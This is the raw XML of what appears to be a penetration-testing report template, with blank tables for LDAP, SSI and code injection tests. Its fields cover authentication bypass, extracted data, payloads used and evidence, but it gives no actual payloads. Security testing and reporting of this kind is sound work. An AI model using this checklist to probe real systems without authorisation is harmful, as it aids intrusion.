          <w:p w14:paraId="65633B9F" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1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C63D1" w:rsidRPr="00DB0B95" w14:paraId="6B601288" w14:textId="77777777" w:rsidTr="007B478C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4CF0425B" w14:textId="20F6C0A4" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00B14D5C" w:rsidP="007B478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Target </w:t>
            </w:r>
            <w:r w:rsidR="00BC63D1"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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="382E82E3" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1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C63D1" w:rsidRPr="00DB0B95" w14:paraId="34636562" w14:textId="77777777" w:rsidTr="007B478C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FB3E3F7" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="007B478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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133D5E9D" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1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C63D1" w:rsidRPr="00DB0B95" w14:paraId="1D5134E9" w14:textId="77777777" w:rsidTr="007B478C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1C5A6D28" w14:textId="0FE6BB9C" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="007B478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C63D1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>LDAP Injection Point Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="541A57AB" w14:textId="7F0C78C6" w:rsidR="00BC63D1" w:rsidRPr="00632E60" w:rsidRDefault="00BC63D1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32E6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59488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Yes/No, </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC63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Affected Input Fields: Login, Search, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00632E6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1A2278C" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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4D3D2F8" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1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C63D1" w:rsidRPr="00DB0B95" w14:paraId="666CD298" w14:textId="77777777" w:rsidTr="007B478C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742E20FE" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="001B44C5" w:rsidRDefault="00BC63D1" w:rsidP="007B478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94888">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Authentication Bypass Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28B4B6B2" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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59488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Details of Exploit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7D19F69" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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FDD4353" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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C63D1" w:rsidRPr="00DB0B95" w14:paraId="1FDD6397" w14:textId="77777777" w:rsidTr="007B478C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77D7EC67" w14:textId="5191E5C1" w:rsidR="00BC63D1" w:rsidRPr="001B44C5" w:rsidRDefault="00BC63D1" w:rsidP="007B478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C63D1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Sensitive Data Extracted via LDAP Injection?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31952DCB" w14:textId="7210B89F" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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BC63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Extracted Attributes: Users, Admins,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30AA0AF" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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9C32E8C" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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C63D1" w:rsidRPr="00DB0B95" w14:paraId="3AE96938" w14:textId="77777777" w:rsidTr="007B478C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0B424A36" w14:textId="7BFBAC02" w:rsidR="00BC63D1" w:rsidRPr="007930E4" w:rsidRDefault="00BC63D1" w:rsidP="007B478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C63D1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Injection Payloads Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0925AF7F" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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5CA3F42" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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E635F" w:rsidRPr="00DB0B95" w14:paraId="7EA38874" w14:textId="77777777" w:rsidTr="007B478C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6D1D613F" w14:textId="1FC4465E" w:rsidR="006E635F" w:rsidRPr="00BC63D1" w:rsidRDefault="006E635F" w:rsidP="007B478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Approach Followed </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CA92AF1" w14:textId="77777777" w:rsidR="006E635F" w:rsidRDefault="006E635F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B289331" w14:textId="77777777" w:rsidR="006E635F" w:rsidRDefault="006E635F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C63D1" w:rsidRPr="00DB0B95" w14:paraId="006765EB" w14:textId="77777777" w:rsidTr="007B478C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2776638F" w14:textId="11E7F34A" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1" w:rsidP="007B478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C63D1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Observed Server Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03D6331A" w14:textId="5C7CEE3A" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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BC63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Unauthorized Access, Excessive Data Disclosure,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B73313B" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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D347489" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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C63D1" w:rsidRPr="00DB0B95" w14:paraId="3510403F" w14:textId="77777777" w:rsidTr="007B478C">
        <w:trPr>
          <w:trHeight w:val="1250"/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19BD9A0D" w14:textId="453A7BCD" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="007B478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C63D1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Intercepted Requests &amp; Modifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19CBA89D" w14:textId="7A2CDBFC" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1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F267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6E635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Example: </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC63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Burp Suite Intercept Logs, Request Parameters Modified</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF267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6E635F" w:rsidRPr="00DB0B95" w14:paraId="7AB3B717" w14:textId="77777777" w:rsidTr="007B478C">
        <w:trPr>
          <w:trHeight w:val="1250"/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0DC0BAD6" w14:textId="34ACF45F" w:rsidR="006E635F" w:rsidRPr="00BC63D1" w:rsidRDefault="006E635F" w:rsidP="007B478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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35CC53B2" w14:textId="644C5535" w:rsidR="006E635F" w:rsidRPr="00FF267C" w:rsidRDefault="006E635F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[*If Any]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w14:paraId="05AA1DFF" w14:textId="77777777" w:rsidTr="007B478C">
        <w:trPr>
          <w:trHeight w:val="1250"/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4B7D792C" w14:textId="543746B3" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="006E635F" w:rsidP="007B478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6E635F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="279E798F" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1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E635F" w:rsidRPr="00DB0B95" w14:paraId="666CE931" w14:textId="77777777" w:rsidTr="007B478C">
        <w:trPr>
          <w:trHeight w:val="1250"/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39D71A57" w14:textId="3707F71A" w:rsidR="006E635F" w:rsidRDefault="006E635F" w:rsidP="007B478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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C1A4244" w14:textId="77777777" w:rsidR="006E635F" w:rsidRPr="00DB0B95" w:rsidRDefault="006E635F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C63D1" w:rsidRPr="00DB0B95" w14:paraId="1C804060" w14:textId="77777777" w:rsidTr="007B478C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6A4D7835" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="007B478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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3909686A" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="171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8F77836" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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8CB70F5" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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FB92976" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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D78987D" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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67EE0BC" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1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C63D1" w:rsidRPr="00DB0B95" w14:paraId="6DFA7404" w14:textId="77777777" w:rsidTr="007B478C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7F325F90" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1" w:rsidP="007B478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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A891C76" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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915AC2B" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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F7AA42C" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRDefault="00BC63D1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EF8E874" w14:textId="77777777" w:rsidR="00BC63D1" w:rsidRPr="00DB0B95" w:rsidRDefault="00BC63D1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67753C6C" w14:textId="77777777" w:rsidR="00574843" w:rsidRDefault="00574843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F56016" w:rsidRPr="00A51A96" w14:paraId="4BAF9DA6" w14:textId="77777777" w:rsidTr="005B7450">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4363187F" w14:textId="02AC4E0B" w:rsidR="00F56016" w:rsidRPr="003C713F" w:rsidRDefault="00F56016" w:rsidP="00972D9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bookmarkStart w:id="11" w:name="_Hlk189228262"/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8.4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F56016">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for SSI Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="11"/>
    </w:tbl>
    <w:p w14:paraId="28DAA8FA" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="005B7450" w:rsidRDefault="00F56016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5"/>
        <w:gridCol w:w="2530"/>
        <w:gridCol w:w="6610"/>
        <w:gridCol w:w="95"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F56016" w:rsidRPr="00DB0B95" w14:paraId="26C67120" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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1BC05696" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="005B745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bookmarkStart w:id="12" w:name="_Hlk189228303"/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3CC68418" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016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56016" w:rsidRPr="00DB0B95" w14:paraId="251220FC" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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25EE9B63" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="005B745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Target </w:t>
            </w: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4DCBF8BC" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016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56016" w:rsidRPr="00DB0B95" w14:paraId="2F4011FD" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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43883179" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="005B745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5ADEC533" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016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56016" w:rsidRPr="00DB0B95" w14:paraId="5CD25CC1" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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47FEF64B" w14:textId="44780BA8" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="005B745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56016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SSI Injection Points Identified?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1B3B7DDB" w14:textId="683FDA30" w:rsidR="00F56016" w:rsidRPr="00632E60" w:rsidRDefault="00F56016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32E6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59488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Yes/No, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F5601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List of Pages with .shtml, .stm Extensions, Input Fields, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00632E6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457EF88" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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C8D1E5B" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F5601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56016" w:rsidRPr="00DB0B95" w14:paraId="3A5ABD59" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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0D3D2DD6" w14:textId="0854A7EB" w:rsidR="00F56016" w:rsidRPr="001B44C5" w:rsidRDefault="00F56016" w:rsidP="005B745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56016">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Basic SSI Injection Payloads Executed?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7F14166C" w14:textId="2F85BC93" w:rsidR="00F56016" w:rsidRDefault="00F5601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F5601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Output Observed if Successful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0AD2977" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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E1C9A5D" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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56016" w:rsidRPr="00DB0B95" w14:paraId="2D152AFB" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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461ED7D3" w14:textId="6062D698" w:rsidR="00F56016" w:rsidRPr="001B44C5" w:rsidRDefault="00F56016" w:rsidP="005B745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56016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Advanced Command Execution Attempts?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284A80FC" w14:textId="3D77A5A1" w:rsidR="00F56016" w:rsidRDefault="00F5601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F5601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Commands Used &amp; Results if Successful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D431A63" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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25835D0" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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56016" w:rsidRPr="00DB0B95" w14:paraId="2C7250BD" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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201E9E6D" w14:textId="311A6FB2" w:rsidR="00F56016" w:rsidRPr="007930E4" w:rsidRDefault="002C242C" w:rsidP="005B745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C242C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SSI Injection via HTTP Headers?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51B07AC3" w14:textId="45AF391F" w:rsidR="00F56016" w:rsidRDefault="002C242C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2C242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Headers Tested: Referer, User-Agent,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A626965" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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C242C" w:rsidRPr="00DB0B95" w14:paraId="09AECFCE" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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3326DA09" w14:textId="1AD962FF" w:rsidR="002C242C" w:rsidRPr="002C242C" w:rsidRDefault="002C242C" w:rsidP="005B745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C242C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SSI Injection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Successful?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3D0ECA4B" w14:textId="5C2F0CF0" w:rsidR="002C242C" w:rsidRDefault="002C242C" w:rsidP="002C242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2C242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Yes/No, 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Give Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74876807" w14:textId="77777777" w:rsidR="002C242C" w:rsidRDefault="002C242C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56016" w:rsidRPr="00DB0B95" w14:paraId="5D1DB966" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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38901EAE" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00BC63D1" w:rsidRDefault="00F56016" w:rsidP="005B745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Approach Followed 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0BF5BFA6" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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DC5ECE3" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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56016" w:rsidRPr="00DB0B95" w14:paraId="69213C20" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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585E5E7C" w14:textId="0EBC803B" w:rsidR="00F56016" w:rsidRDefault="002C242C" w:rsidP="005B745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C242C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Sensitive Information Disclosed?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375BB27C" w14:textId="598703A3" w:rsidR="00F56016" w:rsidRDefault="00F5601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2C242C" w:rsidRPr="002C242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Directory Listings, System Commands, Server Version,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3DB070D" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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4AA6CEB" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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56016" w:rsidRPr="00DB0B95" w14:paraId="05624F4F" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr>
          <w:trHeight w:val="1250"/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451541A7" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00BC63D1" w:rsidRDefault="00F56016" w:rsidP="005B745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Evidence Collected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5B848154" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00FF267C" w:rsidRDefault="00F56016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[*If Any]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F56016" w:rsidRPr="00DB0B95" w14:paraId="1948FBA7" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr>
          <w:trHeight w:val="1250"/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27892A5F" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="005B745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6E635F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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542B397B" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016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56016" w:rsidRPr="00DB0B95" w14:paraId="45A90A26" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr>
          <w:trHeight w:val="1250"/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1FEAF296" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F56016" w:rsidP="005B745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Remediation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136931D2" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016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56016" w:rsidRPr="00DB0B95" w14:paraId="59EC743B" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr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00F72AE0" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="005B745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25348966" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="172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B87E678" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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7A17BD2" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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9181103" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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B51853E" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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1717D9A" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016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56016" w:rsidRPr="00DB0B95" w14:paraId="2FB2CE94" w14:textId="77777777" w:rsidTr="00F554AD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F33DBDD" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F56016" w:rsidP="005B7450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Results Analysis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63BCA7CF" w14:textId="77777777" w:rsidR="00F56016" w:rsidRDefault="00F5601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2C798BE" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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7579681" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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16F06C0" w14:textId="77777777" w:rsidR="006651A9" w:rsidRDefault="006651A9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77E9F51" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00DB0B95" w:rsidRDefault="00F5601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651A9" w:rsidRPr="00A51A96" w14:paraId="6C6F29C8" w14:textId="77777777" w:rsidTr="00F554AD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E8E8E8" w:themeFill="background2"/>
        </w:tblPrEx>
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:gridAfter w:val="1"/>
          <w:wBefore w:w="125" w:type="dxa"/>
          <w:wAfter w:w="95" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="40DCA9E9" w14:textId="2B0FA2CD" w:rsidR="006651A9" w:rsidRPr="003C713F" w:rsidRDefault="006651A9" w:rsidP="00972D9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bookmarkStart w:id="13" w:name="_Hlk189228734"/>
            <w:bookmarkEnd w:id="12"/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8.5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6651A9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Code Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="13"/>
    </w:tbl>
    <w:p w14:paraId="44797970" w14:textId="77777777" w:rsidR="00F56016" w:rsidRPr="00F554AD" w:rsidRDefault="00F56016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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="006651A9" w:rsidRPr="00DB0B95" w14:paraId="1204D6D9" w14:textId="77777777" w:rsidTr="00F554AD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2C247E8B" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="00F554A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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F17758A" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9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651A9" w:rsidRPr="00DB0B95" w14:paraId="121658D1" w14:textId="77777777" w:rsidTr="00F554AD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EB300A5" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="00F554A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Target </w:t>
            </w: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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="142CB487" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9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651A9" w:rsidRPr="00DB0B95" w14:paraId="75BE114D" w14:textId="77777777" w:rsidTr="00F554AD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7E59FF1F" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9" w:rsidP="00F554A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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9D471D" w14:textId="77777777" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="006651A9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651A9" w:rsidRPr="00DB0B95" w14:paraId="35D38BFE" w14:textId="77777777" w:rsidTr="00F554AD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17AABB26" w14:textId="30656251" w:rsidR="006651A9" w:rsidRPr="00DB0B95" w:rsidRDefault="00644D7F" w:rsidP="00F554A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44D7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Testing Approach Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BDA642B" w14:textId="5DE4F25C" w:rsidR="006651A9" w:rsidRPr="00632E60" w:rsidRDefault="006651A9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32E6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F554AD" w:rsidRPr="00644D7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Black Box</w:t>
            </w:r>
            <w:r w:rsidR="00644D7F" w:rsidRPr="00644D7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, </w:t>
            </w:r>
            <w:r w:rsidR="008A5378" w:rsidRPr="00644D7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Gray Box</w:t>
            </w:r>
            <w:r w:rsidR="00644D7F" w:rsidRPr="00644D7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, Both</w:t>
            </w:r>
